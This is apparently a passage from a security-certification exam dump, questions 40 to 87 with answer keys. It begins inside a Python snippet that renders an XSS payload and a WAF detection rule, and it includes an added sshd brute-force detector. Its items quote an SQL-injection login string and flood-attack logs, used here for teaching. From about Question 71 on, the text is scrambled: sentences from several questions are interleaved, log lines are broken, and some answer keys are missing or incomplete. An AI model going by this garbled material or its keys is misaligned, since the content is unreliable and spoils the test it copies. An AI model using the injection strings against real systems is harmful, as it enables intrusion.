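def waf_blocks(param_value):
    """Decision the WAF makes for one parameter value."""
    return XSS_RULE.search(param_value) is not None


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_encoded(PAYLOAD))
    print("blocked:", waf_blocks(PAYLOAD))
```

Encoding turns the leading quote into &#x27; and the angle brackets into &lt; and &gt;, so the browser sees one long attribute value instead of a closed tag plus a script; the WAF rule is the stopgap that buys the developer time, not a substitute for the encoding fix.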

A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 40
An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence?

A. Review switch and router configurations
B. Review the security policies and standards
C. Perform a network penetration test
D. Review the firewall rule set and IPS logs

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 41
A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization's customer database. The database will be accessed by both the company's users and its customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO).

A. Physical penetration test of the datacenter to ensure there are appropriate controls.
B. Penetration testing of the solution to ensure that the customer data is well protected.
C. Security clauses are implemented into the contract such as the right to audit.

D. Code review of the solution to ensure that there are no back doors located in the software.
E. Review of the organization's security policies, procedures and relevant hosting certifications.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 42
The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The documentation shows that a single 24 hours downtime in a critical business function will cost the business $2.3 million. Additionally, the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which of the following should the CIO recommend to the finance director to minimize financial loss?

A. The company should mitigate the risk.
B. The company should transfer the risk.
C. The company should avoid the risk.
D. The company should accept the risk.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 43
The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor authentication on the company's wireless system. Due to budget constraints, the company will be unable to implement the requirement for the next two years. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the exception form? (Select THREE).

A. Business or technical justification for not implementing the requirements.
B. Risks associated with the inability to implement the requirements.
C. Industry best practices with respect to the technical implementation of the current controls.

D. All sections of the policy that may justify non-implementation of the requirements.
E. A revised DRP and COOP plan to the exception form.
F. Internal procedures that may justify a budget submission to implement the new requirement.
G. Current and planned controls to mitigate the risks.

Correct Answer: ABG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 44
A security firm is writing a response to an RFP from a customer that is building a new network based software product. The firm's expertise is in penetration testing corporate networks. The RFP explicitly calls for all possible behaviors of the product to be tested, however, it does not specify any particular method to achieve this goal. Which of the following should be used to ensure the security and functionality of the product? (Select TWO).

A. Code review
B. Penetration testing
C. Grey box testing
D. Code signing
E. White box testing

Correct Answer: AE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 45
A company is in the process of implementing a new front end user interface for its customers, the goal is to provide them with more self service functionality. The application has been written by developers over the last six months and the project is currently in the test phase. Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO).

A. Perform unit testing of the binary code
B. Perform code review over a sampling of the front end source code
C. Perform black box penetration testing over the solution
D. Perform grey box penetration testing over the solution
E. Perform static code review over the front end source code

Correct Answer: DE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 46
An analyst connects to a company web conference hosted on www.webconference.com/meetingID#01234 and observes that numerous guests have been allowed to join, without providing identifying information. The topics covered during the web conference are considered proprietary to the company. Which of the following security concerns does the analyst present to management?

A. Guest users could present a risk to the integrity of the company's information
B. Authenticated users could sponsor guest access that was previously approved by management
C. Unauthenticated users could present a risk to the confidentiality of the company's information
D. Meeting owners could sponsor guest access if they have passed a background check

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 47
An application present on the majority of an organization's 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?

A. Deploy custom HIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
C. Run the application in terminal services to reduce the threat landscape.
D. Deploy custom NIPS signatures to detect and block the attacks.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 48
An external penetration tester compromised one of the client organization's authentication servers and retrieved the password database. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organization's other systems, without impacting the integrity of any of the systems?

A. Use the pass the hash technique
B. Use rainbow tables to crack the passwords
C. Use the existing access to change the password
D. Use social engineering to obtain the actual password

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 49
A security administrator notices a recent increase in workstations becoming compromised by malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites, and is not being detected by the corporate antivirus. Which of the following solutions would provide the BEST protection for the company?

A. Increase the frequency of antivirus downloads and install updates to all workstations.
B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections.
C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits.
D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 50
The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing,

system log gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to the RFQ. Which of the following questions is the MOST important?

A. What are the protections against MITM?
B. What accountability is built into the remote support application?
C. What encryption standards are used in tracking database?
D. What snapshot or "undo" features are present in the application?
E. What encryption standards are used in remote desktop and file transfer functionality?

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 51
A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool?

A. The tool could show that input validation was only enabled on the client side
B. The tool could enumerate backend SQL database table and column names
C. The tool could force HTTP methods such as DELETE that the server has denied
D. The tool could fuzz the application to determine where memory leaks occur

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 52
An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly. Which of the following has been

overlooked in securing the system? (Select TWO).

A. The company's IDS signatures were not updated.
B. The company's custom code was not patched.
C. The patch caused the system to revert to http.
D. The software patch was not cryptographically signed.
E. The wrong version of the patch was used.
F. Third-party plug-ins were not patched.

Correct Answer: BF
Section: (none)
Explanation

Explanation/Reference:

QUESTION 53
Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete?

A. They should logon to the system using the username concatenated with the 6-digit code and their original password.
B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.
C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed.
D. They should use the username format: first.lastname@company.com, together with a password and their 6-digit code.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 54
A security engineer on a large enterprise network needs to schedule maintenance within a fixed window of time. A total outage period of four hours is permitted for servers. Workstations can undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify parameters for the maintenance work? (Select TWO).

A. Managed security service
B. Memorandum of understanding
C. Quality of service
D. Network service provider
E. Operating level agreement

Correct Answer: BE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 55
Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices?

A. Single sign-on
B. Identity propagation
C. Remote attestation
D. Secure code review

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 56
Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietary information and closely guarded corporate trade secrets. The information security team has been a part of the department meetings and come away with the following notes:

-Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee management application, a cloud-based SaaS application.
-Sales is asking for easy order tracking to facilitate feedback to customers.
-Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with data ownership questions and legal jurisdiction.
-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to be quick and easy.
-Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-only access to the entire workflow process for monitoring and baselining.

The favored solution is a user friendly software application that would be hosted onsite. It has extensive ACL functionality. It supports read-only access, custom fields, kiosk automation, and data encryption, but also has readily available APIs for extensibility. Which of the following departments' request is in contrast to the favored solution?

A. Manufacturing

B. Legal
C. Sales
D. Quality assurance
E. Human resources

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 57
A university requires a significant increase in web and database server resources for one week, twice a year, to handle student registration. The web servers remain idle for the rest of the year. Which of the following is the MOST cost effective way for the university to securely handle student registration?

A. Virtualize the web servers locally to add capacity during registration.
B. Move the database servers to an elastic private cloud while keeping the web servers local.
C. Move the database servers and web servers to an elastic private cloud.
D. Move the web servers to an elastic public cloud while keeping the database servers local.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 58
A security engineer is a new member to a configuration board at the request of management. The company has two new major IT projects starting this year and wants to plan security into the application deployment. The board is primarily concerned with the applications' compliance with federal assessment and authorization standards. The security engineer asks for a timeline to determine when a security assessment of both applications should occur and does not attend subsequent configuration board meetings. If the security engineer is only going to perform a security assessment, which of the following steps in system authorization has the security engineer omitted?

A. Establish the security control baseline
B. Build the application according to software development security standards
C. Review the results of user acceptance testing
D. Consult with the stakeholders to determine which standards can be omitted

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 59
During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution?

A. Implement an IPS to block the application on the network
B. Implement the remote application out to the rest of the servers
C. Implement SSL VPN with SAML standards for federation
D. Implement an ACL on the firewall with NAT for remote access

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 60
The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. The company needs an effective communication solution to remain in constant contact with each other, while maintaining a secure business environment. A junior-level administrator suggests that the company and the sales staff stay connected via free social media. Which of the following decisions is BEST for the CEO to make?

A. Social media is an effective solution because it is easily adaptable to new situations.
B. Social media is an ineffective solution because the policy may not align with the business.
C. Social media is an effective solution because it implements SSL encryption.
D. Social media is an ineffective solution because it is not primarily intended for business applications.

Correct Answer: B

Section: (none)
Explanation

Explanation/Reference:

QUESTION 61
There have been some failures of the company's internal facing website. A security engineer has found the WAF to be the root cause of the failures. System logs show that the WAF has been unavailable for 14 hours over the past month, in four separate situations. One of these situations was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using the MTTR based on the last month's performance figures, which of the following calculations is the percentage of uptime assuming there were 722 hours in the month?

A. 92.24 percent
B. 98.06 percent
C. 98.34 percent
D. 98.72 percent

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
The two hour scheduled maintenance window is planned downtime and is not counted against availability, which leaves 14 - 2 = 12 hours of unplanned outage: (722 - 12) / 722 = 98.34 percent. Counting all 14 hours would give (722 - 14) / 722 = 98.06 percent, option B.

QUESTION 62
A security administrator is shown the following log excerpt from a Unix system:

2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2

Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).

A. An authorized administrator has logged into the root account remotely.

B. The administrator should disable remote root logins.
C. Isolate the system immediately and begin forensic analysis on the host.
D. A remote attacker has compromised the root account using a buffer overflow in sshd.
E. A remote attacker has guessed the root password using a dictionary attack.
F. Use iptables to immediately DROP connections from the IP 198.51.100.23.
G. A remote attacker has compromised the private key of the root account.
H. Change the root password immediately to a password not found in a dictionary.

Correct Answer: CE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 63
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?

A. vTPM
B. HSM
C. TPM
D. INE

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 64
Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test?

A. Test password complexity of all login fields and input validation of form fields
B. Reverse engineering any thick client software that has been provided for the test
C. Undertaking network-based denial of service attacks in production environment
D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks
E. Running a vulnerability scanning tool to assess network and host weaknesses

Correct Answer: C
Section: (none)
Explanation
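Added example, not part of the exam dump: detection logic in Python run over the six sshd lines of Question 62. It parses each line, groups events by source address and user, and raises an alert when several failures inside a short window are followed by a success from the same source, which is the password-guessing pattern the question describes rather than an administrator mistyping once. Note that real OpenSSH logs a success as "Accepted password for", not "Successful login for"; the pattern below accepts both wordings. The threshold and window values are assumptions.

```python
import re
from datetime import datetime

# The six lines from the question, embedded as sample input.
LOG = """\
2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2
"""

# Accepts the page's wording and OpenSSH's real "Accepted password"/"Accepted publickey" messages.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4} \w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<outcome>Failed password|Accepted password|Accepted publickey|Successful login) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def parse(log_text):
    """Turn raw sshd lines into event dicts; lines that do not match the pattern are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y %b %d %H:%M:%S"),
            "host": m["host"],
            "user": m["user"],
            "ip": m["ip"],
            "port": int(m["port"]),
            "success": m["outcome"] != "Failed password",
        })
    return events


def detect_guessing(events, threshold=3, window_seconds=300):
    """Alert when a (source IP, user) pair records >= threshold failures inside the window and then succeeds.

    A run of rapid failures ending in a success from the same source means the password was
    guessed, so the host has to be treated as compromised (isolate and investigate), not merely
    firewalled or given a new password.
    """
    alerts = []
    recent_failures = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["ip"], ev["user"])
        fails = recent_failures.setdefault(key, [])
        # Drop failures that fell out of the sliding window.
        fails[:] = [t for t in fails if (ev["ts"] - t).total_seconds() <= window_seconds]
        if ev["success"]:
            if len(fails) >= threshold:
                alerts.append({"ip": ev["ip"], "user": ev["user"], "host": ev["host"],
                               "failures": len(fails), "success_at": ev["ts"]})
            fails.clear()
        else:
            fails.append(ev["ts"])
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(parse(LOG)):
        print(f"{alert['host']}: {alert['failures']} failures then success for "
              f"{alert['user']} from {alert['ip']} at {alert['success_at']}")
```

On the page's lines this yields one alert (five failures in about a minute, then a success for root from 198.51.100.23); a single failure followed by a success from one address produces none, which is what keeps an administrator's typo from paging anyone.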

Explanation/Reference:

QUESTION 65
A company is facing penalties for failing to effectively comply with e-discovery requests. Which of the following could reduce the overall risk to the company from this issue?

A. Establish a policy that only allows filesystem encryption and disallows the use of individual file encryption.
B. Require each user to log passwords used for file encryption to a decentralized repository.
C. Permit users to only encrypt individual files using their domain password and archive all old user passwords.
D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 66
A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been implemented by the developers?

A. SSL certificate revocation
B. SSL certificate pinning
C. Mobile device root-kit detection
D. Extended Validation certificates

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 67
An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical and electronic security measures. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE).

A. Facilities management
B. Human resources
C. Research and development
D. Programming
E. Data center operations
F. Marketing
G. Information technology

Correct Answer: AEG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 68
An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in-the-middle attack. Which of the following controls should be implemented to mitigate the attack in the future?

A. Use PAP for secondary authentication on each RADIUS server
B. Disable unused EAP methods on each RADIUS server
C. Enforce TLS connections between RADIUS servers
D. Use a shared secret for each pair of RADIUS servers

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 69
A security consultant is conducting a network assessment and wishes to discover any legacy backup Internet connections the network may have. Where would the consultant find this information and why would it be valuable?

A. This information can be found in global routing tables, and is valuable because backup connections typically do not have perimeter protection as strong as the primary connection.
B. This information can be found by calling the regional Internet registry, and is valuable because backup connections typically do not require VPN access to the network.
C. This information can be found by accessing telecom billing records, and is valuable because backup connections typically have much lower latency than primary connections.
D. This information can be found by querying the network's DNS servers, and is valuable because backup DNS servers typically allow recursive queries from Internet hosts.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 70
A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The core of the POS is an extranet site, accessible only from retail stores and the corporate office over a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the main office, which provides voice connectivity for store VoIP phones. Each store offers guest wireless functionality, as well as employee wireless. Only the staff wireless network has access to the POS VPN. Recently, stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice quality when making phone calls. Upon investigation, it is determined that three store PCs are hosting malware, which is generating excessive network traffic. After malware removal, the information security department is asked to review the configuration and suggest changes to prevent this from happening again. Which of the following denotes the BEST way to mitigate future malware risk?

A. Deploy new perimeter firewalls at all stores with UTM functionality.
B. Change antivirus vendors at the store and the corporate office.
C. Move to a VDI solution that runs offsite from the same data center that hosts the new POS solution.
D. Deploy a proxy server with content filtering at the corporate office and route all traffic through it.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 71
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following

The security administrator is concerned that someone may log on as the administrator.tmp) containing the price of the item being purchased. C. (e. Session hijacking Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 72 A developer has implemented a piece of client-side JavaScript code to sanitize a user's provided input to a web page login screen.1" 200 5724 Given this log.g.DD-YYYY. a temporary file is created on the web server /tmp directory. D.[02/Mar/2014:06:13:04] "GET /site/script. A security administrator is concerned with the following web server log: 10. The security administrator is concerned with SQL injection.piece of code used by a web based shopping cart.11 . and the developer should implement server side input validation. Input validation B.62. and that only a 6-digit PIN is entered in the password field. The security administrator is concerned with nonprintable characters being used to gain administrative access. Correct Answer: C Section: (none) Explanation . TOCTOU D. and the developer should ensure strong passwords are enforced. The programmer found that every time a user adds an item to the cart. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM. and the developer should normalize Unicode characters on the browser side. smartphone-12-25-2013. SQL injection C. which of the following is the security administrator concerned with and which fix should be implemented by the developer? A. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items? A. and the developer should strip all nonprintable characters.php?user=admin&pass=pass%20or%201=1 HTTP/1. SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT). The code ensures that only the upper case and lower case letters are entered in the username field.235. B. The security administrator is concerned with XSS.

Explanation/Reference: QUESTION 73 The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. an ACL should be placed on the company's external router to block incoming UDP port 19 traffic.213.176. Internal services that are normally available to the public via the Internet are inaccessible.192.19 > 128.55. The senior security engineer starts by reviewing the bandwidth at the border router.19. length 1400 Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration? A.19: UDP. length 1400 11:16:22. length 1400 11:16:22.19 > 128.19 > 128. but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data? A.2. After the senior engineer used a packet capture to identify an active Smurf attack. the company's ISP should be contacted and instructed to block the malicious packets.110358 IP 192.31.19. and employees in the office are unable to browse the Internet. The security engineer then inspects the following piece of log to try and determine the reason for the downtime. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 74 A user has a laptop configured with multiple operating system installations.19: UDP.20.132.176. an IPS filter should be enabled to block the attack and restore communication.19.7.237.176. focusing on the company's external router's IP which is 128.27.176.27.19: UDP. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack.176.19 > 128.110402 IP 70.20. B. The operating systems are all installed on a single SSD.200.20.19: 11:16:22. Encryption of each individual partition B. and notices that the incoming bandwidth on the router's external interface is maxed out.39.19: UDP.19 > 128. FDE of each logical volume on the SSD D.110406 IP 112.176. 
length 1400 11:16:22. length 1400 11:16:22.20.19.200. a BGP sinkhole should be configured to drop traffic at the source networks.20. After the senior engineer used a network analyzer to identify an active Fraggle attack.201. C.20. Encryption of the SSD at the file level C. FDE of the entire SSD as a single disk .19: UDP. D. After the senior engineer used a mirror port to capture the ongoing amplification attack.112.110351 IP 23.110343 IP 90.19.

Requirement 5 under 4. and 5 B. 2. A. SSH.Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 75 A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. 3. Requirement 5 under 4 C. Requirement 4: The system shall provide integrity for all data at rest. Requirement 1: The system shall provide confidentiality for data in transit and data at rest. Authentication C. Level 2: Requirement 2 under 1. A. Level 1: Requirements 1 and 4. Requirement 3: The system shall implement a file-level encryption scheme. Which of the following security goals does this meet? (Select TWO). Availability B. The administrator deploys DNSSEC extensions to the domain names and infrastructure. Level 2: Requirements 2 and 3 under 1. Level 1: Requirements 1. Level 1: Requirements 1 and 4. Encryption Correct Answer: BC Section: (none) Explanation Explanation/Reference: QUESTION 76 A security engineer is working on a large software development project. Requirement 2: The system shall use SSL. Various security requirements were also documented. various stakeholder requirements were gathered and decomposed to an implementable and testable level. Confidentiality E. or SCP for all data transport. Requirement 5: The system shall perform CRC checks on all files. As part of the design of the project. Level 2: Requirements 2. Level 1: Requirements 1 and 4. and 3. Level 2: Requirements 4 and 5 . Organize the following security requirements into the correct hierarchy required for an SRTM. Integrity D. Level 3: Requirement 3 under 2 D.

Determine if the requirements can be met with a simpler solution. Security test and evaluation C. Correct Answer: D . C. D. Decrease the current SLA expectations to match the new solution. Which of the following practices satisfy continuous monitoring of authorized information systems? A. As part of running a pilot exercise. Independent verification and validation B. B. Risk assessment Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 78 A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. Which of the following would be the FIRST process to perform as a result of these findings? A. it was determined that it takes three changes to deploy a new application onto the network before it is operational.Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 77 An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. As part of the review ask them to review the control effectiveness. Reuse the firewall infrastructure on other projects. Review to determine if control effectiveness is in line with the complexity of the solution. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Security now has a significant effect on overall availability. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements.

Asset management B. Email C. Transference of risk Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 80 The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. "BYOD clients must meet the company's infrastructure requirements to permit a connection. Instant messaging D. Which of the following is being described? A. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. IT governance C. which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO). BYOD E. A. installation. Desktop sharing . Web cameras B. which provides instructions for the purchase. The policy states that. Change management D." The company also issues a memorandum separate from the policy. and use of the middleware client on BYOD.Section: (none) Explanation Explanation/Reference: QUESTION 79 A company has issued a new mobile device policy permitting BYOD and company-issued devices.

F. Privacy could be compromised as patient records can be viewed in uncontrolled areas. Correct Answer: AD Section: (none) Explanation Explanation/Reference: QUESTION 82 A security administrator is tasked with implementing two-factor authentication for the company VPN. the doctors and specialists can interact with the hospital's system. E. The doctors and specialists access patient records over the hospital's guest WiFi network which is isolated from the internal network with appropriate security controls. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. Malware may be on BYOD devices which can extract data via key logging and screen scrapes. D. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data. Presence Correct Answer: CE Section: (none) Explanation Explanation/Reference: QUESTION 81 A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The patient records management system can be accessed from the guest network and requires two factor authentication. C. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO). B. Using a remote desktop type interface. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable. Which of the following are of MOST concern? (Select TWO). Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. New company policies require a second factor of authentication. and the Information Security Officer has selected PKI as the second factor. A. . Device encryption has not been enabled and will result in a greater likelihood of data loss.

D. configure all layer 3 switches to feed data to the IDS for more effective monitoring. The user's certificate private key must be installed on the VPN concentrator. Correct Answer: B Section: (none) Explanation Explanation/Reference: . D. E. B. The time stamp of the malware in the swap file. The malware file's modify. F. network mapping and fingerprinting is conducted to prepare for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections? A. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 84 A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. B. which of the following helps to determine when the system became infected? A. The CA's certificate public key must be installed on the VPN concentrator. Implement an application whitelist at all levels of the organization. C. Correct Answer: EF Section: (none) Explanation Explanation/Reference: QUESTION 83 News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. Deploy a network based heuristic IDS. After creating an image and determining the directory location of the malware file. The CA's certificate private key must be installed on the VPN concentrator. C. The VPN concentrator's certificate private key must be signed by the CA and installed on the VPN concentrator. Remove local admin permissions from all users and change anti-virus to a cloud aware. B. After the initial exploit. D. access. The date/time stamp of the malware detection in the antivirus logs.A. The user certificate private key must be signed by the CA. change time properties. push technology. The timeline analysis of the file system. C. The VPN concentrator's certificate private key must be installed on the VPN concentrator. The data exfiltration is enabled by malware on a compromised computer. 
Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

The risk of unplanned server outages is reduced. Risk: Offsite replication Mitigation: Multi-site backups C. Which of the following would be the advantage of conducting this kind of penetration test? A. Using documentation provided to them. the pen-test organization can quickly determine areas to focus on. Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest B. Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing D. Risk: Combined data archiving Mitigation: Two-factor administrator authentication Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 87 A web services company is planning a one-time high-profile event to be hosted on the corporate website. has requested that his security engineers put temporary preventive controls in place. a company requires a yearly penetration test. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 86 Which of the following describes a risk and mitigation associated with cloud data storage? A. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology. so Joe. Which of the following would MOST . The results should reflect what attackers may be able to learn about the company. An outage.QUESTION 85 Due to compliance regulations. the Chief Executive Officer (CEO). The results will show an in-depth view of the network and should help pin-point areas of internal weakness. due to an attack. B. would be publicly embarrassing. D. C.

